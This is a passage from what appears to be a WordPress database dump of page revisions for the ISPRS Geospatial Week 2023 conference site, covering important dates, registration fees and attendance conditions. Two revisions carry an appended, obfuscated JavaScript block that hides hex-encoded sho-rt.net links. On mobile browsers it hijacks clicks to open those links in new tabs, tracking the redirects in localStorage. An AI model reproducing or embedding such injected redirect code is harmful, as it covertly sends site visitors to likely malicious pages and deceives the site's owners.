\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-03-31 13:00:00','2023-03-31 13:00:00','',3497,'https://gsw2023.com/?p=3978',0,'revision','',0),
(3979,1,'2023-04-02 00:58:01','2023-04-02 00:58:01','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n</div>\n<p><strong style=\"font-size: 14pt;\">Registration deadlines</strong></p>\n<div class=\"three_quarter first\">\n<ul>\n<li>Early bird registration deadline: May 15, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Late registration deadline: July 15, 2023 <span style=\"text-decoration: line-through;\">July 1, 2023</span></li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-04-02 00:58:01','2023-04-02 00:58:01','',2654,'https://gsw2023.com/?p=3979',0,'revision','',0),
(3980,1,'2023-04-02 01:01:23','2023-04-02 01:01:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>\n<p style=\"font-weight: 400;\">Early bird registration deadline: May 15, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></p>\n</li>\n<li>\n<p style=\"font-weight: 400;\">Late registration deadline: July 15, 2023 <span style=\"text-decoration: line-through;\">July 1, 2023</span></li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors 